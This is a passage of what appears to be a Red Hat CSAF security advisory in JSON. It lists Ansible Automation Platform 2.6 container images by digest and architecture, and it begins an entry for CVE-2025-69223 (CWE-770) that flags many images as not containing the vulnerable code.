"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-69223",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-06T20:01:19.831548+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
